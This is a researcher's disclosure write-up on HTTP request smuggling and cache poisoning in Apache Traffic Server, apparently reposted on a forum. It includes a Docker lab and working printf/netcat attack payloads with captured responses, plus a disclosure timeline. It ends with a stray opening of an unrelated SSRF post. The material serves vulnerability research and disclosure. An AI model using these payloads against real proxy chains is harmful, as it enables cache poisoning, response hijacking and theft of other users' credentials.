#3192: Return 400 if there is whitespace after the field name and before the colon
#3201: Close the connection when returning a 400 error response
#3231: Validate Content-Length headers for incoming requests
#3251: Drain the request body if there is a cache hit

If you have already studied some of my previous posts, some of these sentences might already seem dubious. For example, not closing a response stream after an error 400 is clearly a fault, based on the standards, but it is also a good catch for an attacker. Chances are that by crafting a bad message chain you may succeed in receiving a response for some queries hidden in the body of an invalid request. The last one, "Drain the request body if there is a cache hit", is the nicest one, as we will see in this article, and it was hard to detect.
My original report listed 5 issues:

HTTP request splitting using NULL character in header value
HTTP request splitting using huge header size
HTTP request splitting using double Content-Length headers
HTTP cache poisoning using extra space before separator of header name and header value
HTTP request splitting using ... (no spoiler: I keep that for the end)

Step by step Proof of Concept

To understand the issues, and see the effects, we will be using a demonstration/research environment. If you ever want to test HTTP Smuggling issues you should really, really try to test them in a controlled environment. Testing issues on live environments would be difficult because:

You may have some very good HTTP agents (load balancers, SSL terminators, security filters) between you and your target, hiding most of your successes and errors.
You may trigger errors and behaviors that you have no idea about. For example I encountered random errors on several fuzzing tests (on test envs), unreproducible, before understanding that they were related to the last smuggling issue we will study in this article. Effects were delayed to subsequent tests, and I was not in control, at all.
You may trigger errors on requests sent by other users, and/or for other domains. That's not like testing a self-reflected XSS; you could end up in court for that.

Real-life complete examples usually occur with interactions between several different HTTP agents, like Nginx + Varnish, or ATS + HaProxy, or Pound + IIS + Nodejs, etc. You will have to understand how each actor interacts with the others, and you will see it faster with a local low-level network capture than blindly across an unknown chain of agents (for example, learning how to detect each agent on this chain). So it's very important to be able to rebuild a laboratory env.
And, if you find something, this env can then be used to send detailed bug reports to the program owners (in my own experience, it can sometimes be quite difficult to explain the issues; a working demo helps).

Set-up the lab: Docker instances

We will run 2 Apache Traffic Server instances, one in version 6.x and one in version 7.x. To add some variety, and potential smuggling issues, we will also add an Nginx docker, and an HaProxy one.

4 HTTP actors, each one on a local port:

127.0.0.1:8001 : HaProxy (internally listening on port 80)
127.0.0.1:8002 : Nginx (internally listening on port 80)
127.0.0.1:8007 : ATS7 (internally listening on port 8080)
127.0.0.1:8006 : ATS6 (internally listening on port 8080); most examples will use ATS7, but you will be able to test this older version simply by using this port instead of the other (and altering the domain)

We will chain some Reverse Proxy relations: Nginx will be the final backend, HaProxy the front load balancer, and between Nginx and HaProxy we will go through ATS6 or ATS7 based on the domain name used (dummy-host7.example.com for ATS7 and dummy-host6.example.com for ATS6).

Note that the localhost port mappings of the ATS and Nginx instances are not directly needed: if you can inject a request into HaProxy it will reach Nginx internally, via port 8080 of one of the ATS, and port 80 of Nginx. But they can be useful if you want to target one of the servers directly, and we will have to avoid the HaProxy part in most examples, because most attacks would be blocked by this load balancer. So most examples will directly target the ATS7 server first, on 8007. Later you can try to succeed in targeting 8001; that will be harder.
                +---[80]---+
                | 8001->80 |
                | HaProxy  |
                |          |
                +--+---+---+
[dummy-host6.example.com] |   | [dummy-host7.example.com]
           +--------+         +--------+
           |                           |
    +-[8080]-----+              +-[8080]-----+
    | 8006->8080 |              | 8007->8080 |
    |    ATS6    |              |    ATS7    |
    |            |              |            |
    +-----+------+              +----+-------+
          |                          |
          +-----------+--------------+
                      |
                 +--[80]----+
                 | 8002->80 |
                 |  Nginx   |
                 |          |
                 +----------+

To build this cluster we will use docker-compose. You can find the docker-compose.yml file here, but the content is quite short:

version: '3'

services:
  haproxy:
    image: haproxy:1.6
    build:
      context: .
      dockerfile: Dockerfile-haproxy
    expose:
      - 80
    ports:
      - "8001:80"
    links:
      - ats7:linkedats7.net
      - ats6:linkedats6.net
    depends_on:
      - ats7
      - ats6
  ats7:
    image: centos:7
    build:
      context: .
      dockerfile: Dockerfile-ats7
    expose:
      - 8080
    ports:
      - "8007:8080"
    depends_on:
      - nginx
    links:
      - nginx:linkednginx.net
  ats6:
    image: centos:7
    build:
      context: .
      dockerfile: Dockerfile-ats6
    expose:
      - 8080
    ports:
      - "8006:8080"
    depends_on:
      - nginx
    links:
      - nginx:linkednginx.net
  nginx:
    image: nginx:latest
    build:
      context: .
      dockerfile: Dockerfile-nginx
    expose:
      - 80
    ports:
      - "8002:80"

To make this work you will also need the 4 specific Dockerfiles:

Docker-haproxy: an HaProxy Dockerfile, with the right conf
Docker-nginx: a very simple Nginx Dockerfile with one index.html page
Docker-ats7: an ATS 7.1.1 compiled-from-archive Dockerfile
Docker-ats6: an ATS 6.2.2 compiled-from-archive Dockerfile

Put all these files (the docker-compose.yml and the Dockerfile-* files) into a working directory and run in this dir:

docker-compose build && docker-compose up

You can now take a big break; you are launching two compilations of ATS. Hopefully the next time an up will be enough, and even the build may not redo the compilation steps. You can easily add another ats7-fixed element to the cluster, to test a fixed version of ATS if you want. For now we will concentrate on detecting issues in flawed versions.
Test That Everything Works

We will run basic non-attacking queries on this installation, to check that everything is working, and to train ourselves on the printf + netcat way of running queries. We will not use curl or wget to run HTTP queries, because it would be impossible to write bad queries with them. So we need to use low-level string manipulations (with printf for example) and socket handling (with netcat -- or nc --).

Test Nginx (that's a one-liner split for readability):

printf 'GET / HTTP/1.1\r\n'\
'Host:dummy-host7.example.com\r\n'\
'\r\n'\
| nc 127.0.0.1 8002

You should get the index.html response, something like:

HTTP/1.1 200 OK
Server: nginx/1.15.5
Date: Fri, 26 Oct 2018 15:28:20 GMT
Content-Type: text/html
Content-Length: 120
Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT
Connection: keep-alive
ETag: "5bd321bc-78"
X-Location-echo: /
X-Default-VH: 0
Cache-Control: public, max-age=300
Accept-Ranges: bytes

$<html><head><title>Nginx default static page</title></head>
<body><h1>Hello World</h1>
<p>It works!</p>
</body></html>

Then test ATS7 and ATS6:

printf 'GET / HTTP/1.1\r\n'\
'Host:dummy-host7.example.com\r\n'\
'\r\n'\
| nc 127.0.0.1 8007

printf 'GET / HTTP/1.1\r\n'\
'Host:dummy-host6.example.com\r\n'\
'\r\n'\
| nc 127.0.0.1 8006

Then test HaProxy; altering the Host name should make the query transit via ATS7 or ATS6 (check the Server: header of the response):

printf 'GET / HTTP/1.1\r\n'\
'Host:dummy-host7.example.com\r\n'\
'\r\n'\
| nc 127.0.0.1 8001

printf 'GET / HTTP/1.1\r\n'\
'Host:dummy-host6.example.com\r\n'\
'\r\n'\
| nc 127.0.0.1 8001

And now let's start some more complex HTTP stuff: we will make an HTTP pipeline, pipelining several queries and receiving several responses, as pipelining is the root of most smuggling attacks:

# send one pipelined chain of queries
printf 'GET /?cache=1 HTTP/1.1\r\n'\
'Host:dummy-host7.example.com\r\n'\
'\r\n'\
'GET /?cache=2 HTTP/1.1\r\n'\
'Host:dummy-host7.example.com\r\n'\
'\r\n'\
'GET /?cache=3 HTTP/1.1\r\n'\
'Host:dummy-host6.example.com\r\n'\
'\r\n'\
'GET /?cache=4 HTTP/1.1\r\n'\
'Host:dummy-host6.example.com\r\n'\
'\r\n'\
| nc 127.0.0.1 8001

This is pipelining; it's not only using HTTP keep-alive, because we send the chain of queries without waiting for the responses. See my previous post for details on keep-alive and pipelining. You should see the Nginx access log in the docker-compose output. If you do not rotate some arguments in the query, Nginx won't get reached by your requests, because ATS is already caching the result (CTRL+C on the docker-compose output and docker-compose up will remove any cache).

Request Splitting by Double Content-Length

Let's start the real play. That's the 101 of HTTP Smuggling: the easy vector. Double Content-Length header support is strictly forbidden by RFC 7230 section 3.3.3 (item 4, bold added):

If a message is received without Transfer-Encoding and with either multiple Content-Length header fields having differing field-values or a single Content-Length header field having an invalid value, then the message framing is invalid and the recipient MUST treat it as an unrecoverable error. If this is a request message, the server MUST respond with a 400 (Bad Request) status code and then close the connection. If this is a response message received by a proxy, the proxy MUST close the connection to the server, discard the received response, and send a 502 (Bad Gateway) response to the client. If this is a response message received by a user agent, the user agent MUST close the connection to the server and discard the received response.

Differing interpretations of message length based on the order of Content-Length headers were the first demonstrated HTTP smuggling attacks (2005).
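In the attack that follows, the second Content-Length (66) is exactly the byte size of the hidden query, CRLFs included. If you change the hidden query you must recompute that value; a quick way, assuming a shell with GNU coreutils, is:

```shell
# size of the hidden request: must match the smuggled Content-Length
printf 'GET /index.html?toto=2 HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'\r\n'\
| wc -c
# prints 66
```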
Sending such a query directly to ATS generates 2 responses (one 400 and one 200):

printf 'GET /index.html?toto=1 HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'Content-Length: 0\r\n'\
'Content-Length: 66\r\n'\
'\r\n'\
'GET /index.html?toto=2 HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'\r\n'\
|nc -q 1 127.0.0.1 8007

The regular response should be a single error 400. Using port 8001 (HaProxy) would not work: HaProxy is a robust HTTP agent and cannot be fooled by such an easy trick. This is critical Request Splitting, classical, but hard to reproduce in real-life environments if some robust tools are used in the reverse proxy chain. So, why critical? Because you could also consider ATS to be robust, use a new unknown HTTP server behind or in front of ATS, and expect such smuggling attacks to be properly detected. And there is another factor of criticality: any other issue in HTTP parsing can exploit this double Content-Length. Let's say you have another issue which allows you to hide one header from all other HTTP actors, but reveals this header to ATS. Then you just have to use this hidden header for a second Content-Length and you're done, without being blocked by a previous actor. In our current case, ATS, you have one example of such a hidden-header issue with the 'space-before-:' syntax that we will analyze later.

Request Splitting by NULL Character Injection

This example is not the easiest one to understand (go to the next one if you do not get it, or even the one after), and it's also not the biggest impact, as we will use a really bad query to attack, easily detected. But I love the magical NULL (\0) character. Using a NULL byte character in a header triggers a query rejection on ATS, that's ok, but also a premature end of query, and if you do not close pipelines after a first error, bad things could happen. The next line is interpreted as the next query in the pipeline.
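In the listings that follow, \0 stands for a literal NUL byte. The printf builtin can emit it directly; a quick sanity check (assuming GNU coreutils for wc) that the byte really lands in the output:

```shell
# 'X-Something: ' (13) + NUL (1) + ' something' (10) + CRLF (2) = 26 bytes
printf 'X-Something: \0 something\r\n' | wc -c
# prints 26
```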
So, a valid (almost, if you except the NULL character) pipeline like this one:

01 GET /does-not-exists.html?foofoo=1 HTTP/1.1\r\n
02 X-Something: \0 something\r\n
03 X-Foo: Bar\r\n
04 \r\n
05 GET /index.html?bar=1 HTTP/1.1\r\n
06 Host: dummy-host7.example.com\r\n
07 \r\n

generates two 400 errors, because the second query starts with X-Foo: Bar\r\n and that's an invalid first query line. Let's test an invalid pipeline (as there is no \r\n between the 2 queries):

01 GET /does-not-exists.html?foofoo=2 HTTP/1.1\r\n
02 X-Something: \0 something\r\n
03 GET /index.html?bar=2 HTTP/1.1\r\n
04 Host: dummy-host7.example.com\r\n
05 \r\n

It generates one error 400 and one 200 OK response. Lines 03/04/05 are taken as a valid query. This is already an HTTP request splitting attack. But line 03 is a really bad header line that most agents would reject. You cannot read that as a valid unique query. The fake pipeline would be detected early as a bad query; I mean, line 03 is clearly not a valid header line:

GET /index.html?bar=2 HTTP/1.1\r\n
!= <HEADER-NAME-NO-SPACE>[:][SP]<HEADER-VALUE>[CR][LF]

For the first line the syntax is one of these two forms:

<METHOD>[SP]<LOCATION>[SP]HTTP/[M].[m][CR][LF]
<METHOD>[SP]<http[s]://LOCATION>[SP]HTTP/[M].[m][CR][LF] (absolute uri)

LOCATION may be used to inject the special [:] that is required in a header line, especially in the query string part, but this would inject a lot of bad characters into the HEADER-NAME-NO-SPACE part, like '/' or '?'. Let's try the ABSOLUTE-URI alternative syntax, where the [:] comes earlier on the line, and the only bad character for a header name would be the space. This will also fix the potential presence of the double Host header (an absolute uri replaces the Host header).
01 GET /does-not-exists.html?foofoo=2 HTTP/1.1\r\n
02 Host: dummy-host7.example.com\r\n
03 X-Something: \0 something\r\n
04 GET http://dummy-host7.example.com/index.html?bar=2 HTTP/1.1\r\n
05 \r\n

Here the bad header which becomes a query is line 04, with a header name of GET http and a header value of //dummy-host7.example.com/index.html?bar=2 HTTP/1.1. That's still an invalid header (the header name contains a space), but I'm pretty sure we could find some HTTP agents transferring this header (ATS is one proof of that: space characters in header names were allowed). A real attack using this trick will look like this:

printf 'GET /something.html?zorg=1 HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'X-Something: "\0something"\r\n'\
'GET http://dummy-host7.example.com/index.html?replacing=1&zorg=2 HTTP/1.1\r\n'\
'\r\n'\
'GET /targeted.html?replaced=maybe&zorg=3 HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'\r\n'\
|nc -q 1 127.0.0.1 8007

This is just 2 queries (the 1st one has 2 bad headers: one with a NULL, one with a space in the header name); for ATS it's 3 queries. The regular second one (/targeted.html) -- third for ATS -- will get the response of the hidden query (http://dummy-host7.example.com/index.html?replacing=1&zorg=2). Check the X-Location-echo: header added by Nginx. After that, ATS adds a third response, a 404, but the previous actor expects only 2 responses, and the second response is already replaced.

HTTP/1.1 400 Invalid HTTP Request
Date: Fri, 26 Oct 2018 15:34:53 GMT
Connection: keep-alive
Server: ATS/7.1.1
Cache-Control: no-store
Content-Type: text/html
Content-Language: en
Content-Length: 220

<HTML>
<HEAD>
<TITLE>Bad Request</TITLE>
</HEAD>
<BODY BGCOLOR="white" FGCOLOR="black">
<H1>Bad Request</H1>
<HR>
<FONT FACE="Helvetica,Arial"><B>
Description: Could not process this request.
</B></FONT>
<HR>
</BODY>

Then:

HTTP/1.1 200 OK
Server: ATS/7.1.1
Date: Fri, 26 Oct 2018 15:34:53 GMT
Content-Type: text/html
Content-Length: 120
Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT
ETag: "5bd321bc-78"
X-Location-echo: /index.html?replacing=1&zorg=2
X-Default-VH: 0
Cache-Control: public, max-age=300
Accept-Ranges: bytes
Age: 0
Connection: keep-alive

$<html><head><title>Nginx default static page</title></head>
<body><h1>Hello World</h1>
<p>It works!</p>
</body></html>

And then the extra unused response:

HTTP/1.1 404 Not Found
Server: ATS/7.1.1
Date: Fri, 26 Oct 2018 15:34:53 GMT
Content-Type: text/html
Content-Length: 153
Age: 0
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body>
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.15.5</center>
</body>
</html>

If you try to use port 8001 (so transiting via HaProxy) you will not get the expected attacking result. That attacking query is really too bad.

HTTP/1.0 400 Bad request
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>400 Bad request</h1>
Your browser sent an invalid request.
</body></html>

That's an HTTP request splitting attack, but real-world usage may be hard to find. The fix on ATS is the 'close on error': when an error 400 is triggered the pipeline is stopped, and the socket is closed after the error.

Request Splitting using Huge Header, Early End-Of-Query

This attack is almost the same as the previous one, but it does not need the magical NULL character to trigger the end-of-query event. By using headers with a size around 65536 characters we can trigger this event, and exploit it the same way as with the NULL premature end of query.

A note on huge header generation with printf. Here I'm generating a query with one header containing a lot of repeated characters (= or 1 for example):

X: ==============( 65 532 '=' )========================\r\n

You can use the %ns form in printf to generate this, producing a big number of spaces.
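A quick sanity check of the %ns form (assuming GNU coreutils for wc): it pads its argument with spaces up to n characters, which tr can then rewrite into any filler character:

```shell
# %65532s pads the (empty) argument to 65532 spaces
printf '%65532s' '' | wc -c
# prints 65532
```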
But to do that we need to replace some special characters with tr and use _ instead of spaces in the original string:

printf 'X:_"%65532s"\r\n' | tr " " "=" | tr "_" " "

Try it against Nginx:

printf 'GET_/something.html?zorg=6_HTTP/1.1\r\n'\
'Host:_dummy-host7.example.com\r\n'\
'X:_"%65532s"\r\n'\
'GET_http://dummy-host7.example.com/index.html?replaced=0&cache=8_HTTP/1.1\r\n'\
'\r\n'\
|tr " " "1"\
|tr "_" " "\
|nc -q 1 127.0.0.1 8002

I get one error 400; that's the normal stuff, Nginx does not like huge headers. Now try it against ATS7:

printf 'GET_/something.html?zorg2=5_HTTP/1.1\r\n'\
'Host:_dummy-host7.example.com\r\n'\
'X:_"%65534s"\r\n'\
'GET_http://dummy-host7.example.com/index.html?replaced=0&cache=8_HTTP/1.1\r\n'\
'\r\n'\
|tr " " "1"\
|tr "_" " "\
|nc -q 1 127.0.0.1 8007

And after the error 400 we have a 200 OK response. Same problem as in the previous example, and same fix. Here we still have a query with a bad header containing a space, and also one quite big header, but we do not have the NULL character. Then again, 65000 characters is very big; most actors would reject a query after 8000 characters on one line.

HTTP/1.1 400 Invalid HTTP Request
Date: Fri, 26 Oct 2018 15:40:17 GMT
Connection: keep-alive
Server: ATS/7.1.1
Cache-Control: no-store
Content-Type: text/html
Content-Language: en
Content-Length: 220

<HTML>
<HEAD>
<TITLE>Bad Request</TITLE>
</HEAD>
<BODY BGCOLOR="white" FGCOLOR="black">
<H1>Bad Request</H1>
<HR>
<FONT FACE="Helvetica,Arial"><B>
Description: Could not process this request.
</B></FONT>
<HR>
</BODY>

HTTP/1.1 200 OK
Server: ATS/7.1.1
Date: Fri, 26 Oct 2018 15:40:17 GMT
Content-Type: text/html
Content-Length: 120
Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT
ETag: "5bd321bc-78"
X-Location-echo: /index.html?replaced=0&cache=8
X-Default-VH: 0
Cache-Control: public, max-age=300
Accept-Ranges: bytes
Age: 0
Connection: keep-alive

$<html><head><title>Nginx default static page</title></head>
<body><h1>Hello World</h1>
<p>It works!</p>
</body></html>

Cache Poisoning using Incomplete Queries and Bad Separator Prefix

Cache poisoning, that sounds great. In smuggling attacks you should only have to trigger a request or response splitting attack to prove a defect, but when you push that to cache poisoning people usually understand better why split pipelines are dangerous.

ATS supports an invalid header syntax:

HEADER[SPACE]:HEADER VALUE\r\n

That's not conformant to RFC 7230 section 3.2:

Each header field consists of a case-insensitive field name followed by a colon (":"), optional leading whitespace, the field value, and optional trailing whitespace.

So:

HEADER:HEADER_VALUE\r\n => OK
HEADER:[SPACE]HEADER_VALUE\r\n => OK
HEADER:[SPACE]HEADER_VALUE[SPACE]\r\n => OK
HEADER[SPACE]:HEADER_VALUE\r\n => NOT OK

And RFC 7230 section 3.2.4 adds (bold added):

No whitespace is allowed between the header field-name and colon. In the past, differences in the handling of such whitespace have led to security vulnerabilities in request routing and response handling. A server MUST reject any received request message that contains whitespace between a header field-name and colon with a response code of 400 (Bad Request). A proxy MUST remove any such whitespace from a response message before forwarding the message downstream.

ATS will interpret the bad header, and also forward it without alteration.
Using this flaw we can add some headers to our request that are invalid for any valid HTTP agent but still interpreted by ATS, like:

Content-Length :77\r\n

Or (try it as an exercise):

Transfer-encoding :chunked\r\n

Some HTTP servers will effectively reject such a message with an error 400. But some will simply ignore the invalid header. That's the case of Nginx, for example. ATS will maintain a keep-alive connection to the Nginx backend, so we'll use this ignored header to transmit a body (ATS thinks it's a body) that is in fact a new query for the backend. And we'll make this query incomplete (missing a CRLF at the end of the headers) to absorb a future query sent to Nginx. This sort of incomplete query, filled in by the next incoming query, is also a basic smuggling technique demonstrated 13 years ago.

01 GET /does-not-exists.html?cache=x HTTP/1.1\r\n
02 Host: dummy-host7.example.com\r\n
03 Cache-Control: max-age=200\r\n
04 X-info: evil 1.5 query, bad CL header\r\n
05 Content-Length :117\r\n
06 \r\n
07 GET /index.html?INJECTED=1 HTTP/1.1\r\n
08 Host: dummy-host7.example.com\r\n
09 X-info: evil poisoning query\r\n
10 Dummy-unterminated:

Line 05 is invalid (' :'). But for ATS it is valid. Lines 07/08/09/10 are just binary body data for ATS, transmitted to the backend. For Nginx:

Line 05 is ignored.
Line 07 is a new request (and the first response is returned).
Line 10 has no "\r\n", so Nginx is still waiting for the end of this query, on the keep-alive connection opened by ATS ...
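The 117 in the ignored Content-Length is not arbitrary: it is exactly the byte size of the smuggled, unterminated request (whose last line, 'Dummy-unterminated:' in the attack script further down, carries no CRLF). It can be recomputed, assuming a shell with GNU coreutils:

```shell
# the "body" seen by ATS = 1.5 queries seen by Nginx
printf 'GET /index.html?INJECTED=1 HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'X-info: evil poisoning query\r\n'\
'Dummy-unterminated:'\
| wc -c
# prints 117
```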
Attack schema

[ATS Cache poisoning - space before header separator + backend ignoring bad headers]

Innocent        Attacker        ATS             Nginx
    |               |               |               |
    |               |--A(1A+1/2B)-->|               |   * Issue 1 & 2 *
    |               |               |--A(1A+1/2B)-->|   * Issue 3 *
    |               |               |<-A(404)-------|
    |               |               |               | [1/2B]
    |               |<-A(404)-------|               | [1/2B]
    |               |--C----------->|               | [1/2B]
    |               |               |--C----------->|   * ending B *
    |               |         [*CP*]<--B(200)-------|
    |               |<--B(200)------|               |
    |--C--------------------------->|               |
    |<--B(200)--------------------[HIT]             |

1A + 1/2B means request A + an incomplete query B
A(X): means query X is hidden in the body of query A
CP: Cache Poisoning
Issue 1: ATS transmits 'header[SPACE]: Value', a bad HTTP header.
Issue 2: ATS interprets this bad header as valid (so 1/2B stays hidden in the body).
Issue 3: Nginx encounters the bad header but ignores it instead of sending an error 400, so 1/2B is discovered as a new query (no Content-Length).
Request B contains an incomplete header (no CRLF).
Ending B: the 1st line of query C ends the incomplete header of query B; all other headers are added to the query. C disappears, mixing C's HTTP credentials with all the previous B headers (cookie/bearer token/Host, etc.).

Instead of cache poisoning you could also play with the incomplete 1/2B query and wait for an innocent query to finish this request with the HTTP credentials of that user (cookies, HTTP Auth, JWT tokens, etc.). That would be another attack vector. Here we will simply demonstrate cache poisoning.
Run this attack:

for i in {1..9} ;do
printf 'GET /does-not-exists.html?cache='$i' HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'Cache-Control: max-age=200\r\n'\
'X-info: evil 1.5 query, bad CL header\r\n'\
'Content-Length :117\r\n'\
'\r\n'\
'GET /index.html?INJECTED='$i' HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'X-info: evil poisoning query\r\n'\
'Dummy-unterminated:'\
|nc -q 1 127.0.0.1 8007
done

It should work. Nginx adds an X-Location-echo header in this lab configuration, echoing the first line of the query in the response headers. This way we can observe that the second response is removing the real second query's first line and replacing it with the hidden first line. In my case the last query's response contained:

X-Location-echo: /index.html?INJECTED=3

But this last query was GET /index.html?INJECTED=9. You can check the cache content with:

for i in {1..9} ;do
printf 'GET /does-not-exists.html?cache='$i' HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'Cache-Control: max-age=200\r\n'\
'\r\n'\
|nc -q 1 127.0.0.1 8007
done

In my case I found six 404 (regular) and three 200 responses (ouch): the cache is poisoned. If you want to go deeper into understanding smuggling you should try to play with wireshark on this example. Do not forget to restart the cluster to empty the cache. Here we did not play with a C query yet; the cache poisoning occurs on our A query, unless you consider the /does-not-exists.html?cache='$i' queries as C queries. But you can easily try to inject a C query on this cluster, while Nginx has some waiting requests, and try to get it poisoned with /index.html?INJECTED=3 responses:

for i in {1..9} ;do
printf 'GET /innocent-C-query.html?cache='$i' HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'Cache-Control: max-age=200\r\n'\
'\r\n'\
|nc -q 1 127.0.0.1 8007
done

This may give you a feel for real-world exploitation: you have to repeat the attack to obtain something.
Vary the number of servers in the cluster, the pool settings on the various layers of reverse proxies, etc., and things get complex. The easiest attack is to be a chaos generator (defacement-like or DoS); fine cache replacement of a target, on the other hand, requires careful study and a bit of luck.

Does this work on port 8001 with HaProxy? Well, no, of course not. Our header syntax is invalid. You would need to hide the bad query syntax from HaProxy, maybe using another smuggling issue, to hide this bad request in a body. Or you would need a load balancer which does not detect this invalid syntax. Note that in this example the Nginx behavior on invalid header syntax (ignoring it) is also not standard (and won't be fixed, AFAIK). This invalid space prefix problem is the same issue as Apache httpd's CVE-2016-8743.

HTTP Response Splitting: Content-Length Ignored on Cache Hit

Still there? Great! Because now comes the nicest issue. At least for me it was the nicest issue, mainly because I spent a lot of time around it without understanding it. I was fuzzing ATS, and my fuzzer detected issues. Trying to reproduce, I had failures, and successes on previously undetected issues, and back to step 1. Issues you cannot reproduce: you start doubting that you saw them before. Suddenly you find them back, but then no, etc. And of course I was not searching for the root cause on the right examples. I was, for example, triggering tests on bad chunked transmissions, or delayed chunks. It was a very long (too long) time before I detected that all this was linked to the cache hit/cache miss status of my requests.

On a cache hit, the Content-Length header of a GET query is not read. That's so easy when you know it... And exploitation is also quite easy. We can hide a second query in the first query's body, and on a cache hit this body becomes a new query.
This sort of query will get one response at first (and, yes, that's only one query); on a second launch it will render two responses (so an HTTP request splitting by definition):

01 GET /index.html?cache=zorg42 HTTP/1.1\r\n
02 Host: dummy-host7.example.com\r\n
03 Cache-control: max-age=300\r\n
04 Content-Length: 71\r\n
05 \r\n
06 GET /index.html?cache=zorg43 HTTP/1.1\r\n
07 Host: dummy-host7.example.com\r\n
08 \r\n

Line 04 is ignored on a cache hit (only after the first run, then); after that, line 06 is now a new query and not just the 1st query's body. This HTTP query is valid: THERE IS NO invalid HTTP syntax present. So it's quite easy to perform a successful complete smuggling attack from this issue, even using HaProxy in front of ATS. If HaProxy is configured to use a keep-alive connection to ATS, we can fool the HTTP stream of HaProxy by sending a pipeline of two queries where ATS sees 3 queries:

Attack schema

[ATS HTTP-Splitting issue on Cache hit + GET + Content-Length]

Something       HaProxy         ATS             Nginx
    |--A----------->|               |               |
    |               |--A----------->|               |
    |               |               |--A----------->|
    |               |       [cache]<--A-------------|
    | (etc.)<-------|<--A-----------|               |

 -- warmup --------------------------------------------------------

    |--A(+B)+C----->|               |               |
    |               |--A(+B)+C----->|               |
    |               |             [HIT]             |   * Bug *
    |               |<--A-----------|               |   * B 'discovered' *
    |<--A-----------|               |--B----------->|
    |               |               |<-B------------|
    |               |<-B------------|               |
[ouch]<-B-----------|               |               |   * wrong resp. *
    |               |               |--C----------->|
    |               |               |<--C-----------|
    |            [R]<--C------------|               |   rejected

First, we need to initialize the cache; we use port 8001 to get a stream HaProxy->ATS->Nginx:

printf 'GET /index.html?cache=cogip2000 HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'Cache-control: max-age=300\r\n'\
'Content-Length: 0\r\n'\
'\r\n'\
|nc -q 1 127.0.0.1 8001

You can run it two times and see that the second time it does not reach the nginx access.log. Then we attack HaProxy, or any other cache set in front of this HaProxy.
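In the attack that follows, Content-Length: 74 matches the hidden /index.html?evil=cogip2000 request byte-for-byte; you can verify it with (assuming GNU coreutils):

```shell
# size of the hidden request, CRLFs included
printf 'GET /index.html?evil=cogip2000 HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'\r\n'\
| wc -c
# prints 74
```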
We use a pipeline of two queries; ATS will send back three responses. If a keep-alive mode is present in front of ATS, there is a security problem. That is the case here because we do not use option httpclose on HaProxy (which would prevent the usage of pipelines).

printf 'GET /index.html?cache=cogip2000 HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'Cache-control: max-age=300\r\n'\
'Content-Length: 74\r\n'\
'\r\n'\
'GET /index.html?evil=cogip2000 HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'\r\n'\
'GET /victim.html?cache=zorglub HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'\r\n'\
|nc -q 1 127.0.0.1 8001

The query for /victim.html (which should be a 404 in our example) gets the response for /index.html (X-Location-echo: /index.html?evil=cogip2000).

HTTP/1.1 200 OK
Server: ATS/7.1.1
Date: Fri, 26 Oct 2018 16:05:41 GMT
Content-Type: text/html
Content-Length: 120
Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT
ETag: "5bd321bc-78"
X-Location-echo: /index.html?cache=cogip2000
X-Default-VH: 0
Cache-Control: public, max-age=300
Accept-Ranges: bytes
Age: 12

<html><head><title>Nginx default static page</title></head>
<body><h1>Hello World</h1>
<p>It works!</p>
</body></html>

HTTP/1.1 200 OK
Server: ATS/7.1.1
Date: Fri, 26 Oct 2018 16:05:53 GMT
Content-Type: text/html
Content-Length: 120
Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT
ETag: "5bd321bc-78"
X-Location-echo: /index.html?evil=cogip2000
X-Default-VH: 0
Cache-Control: public, max-age=300
Accept-Ranges: bytes
Age: 0

<html><head><title>Nginx default static page</title></head>
<body><h1>Hello World</h1>
<p>It works!</p>
</body></html>

Here the issue is critical, especially because there is no invalid syntax in the attacking query. We have an HTTP response splitting, which means two main impacts:
- ATS may be used to poison or hurt an actor placed in front of it;
- the second query is hidden (it is a body: binary garbage for an HTTP actor), so any security filter set in front of ATS cannot block it.
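Since the keep-alive connection between HaProxy and ATS is what lets the pipeline through, the relevant HaProxy knob looks roughly like this (a sketch, assuming HaProxy 1.x directive names; the backend name and address are made up for this lab):

```
# Hypothetical lab backend: force 'Connection: close' on each request so
# pipelined requests cannot ride the same HaProxy -> ATS connection.
backend ats_lab
    mode http
    option httpclose
    server ats1 127.0.0.1:8080 check
```

With this in place, each client request gets its own backend connection, so the extra response "discovered" by ATS has no later request to be mismatched with.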
We could use that to hide a second layer of attack, like an ATS cache poisoning as described in the other attacks. Now that you have a working lab you can try embedding several layers of attacks... That is what the "Drain the request body if there is a cache hit" fix is about.

To better understand the real-world impact: here the only one receiving response B instead of C is the attacker, and HaProxy is not a cache, so the C-request/B-response mix on HaProxy is not a direct threat. But if there is a cache in front of HaProxy, or if several ATS proxies are chained...

Timeline

2017-12-26: report to project maintainers
2018-01-08: acknowledgment by project maintainers
2018-04-16: version 7.1.3 with most of the fixes
2018-08-04: versions 7.1.4 and 6.2.2 (officially containing all the fixes, plus some other CVE fixes)
2018-08-28: CVE announcement
2019-09-17: this article (yes, the URL date is wrong; the real date is September)

See also

Video: Defcon 24: HTTP Smuggling
Defcon support
Video: Defcon demos

Source: https://regilero.github.io/english/security/2019/10/17/security_apache_traffic_server_http_smuggling/
    1 point
  9. SSRF | Reading Local Files from DownNotifier server

Posted on September 18, 2019 by Leon

Hello guys, this is my first write-up and I would like to share it with the bug bounty community: an SSRF I found some months ago.

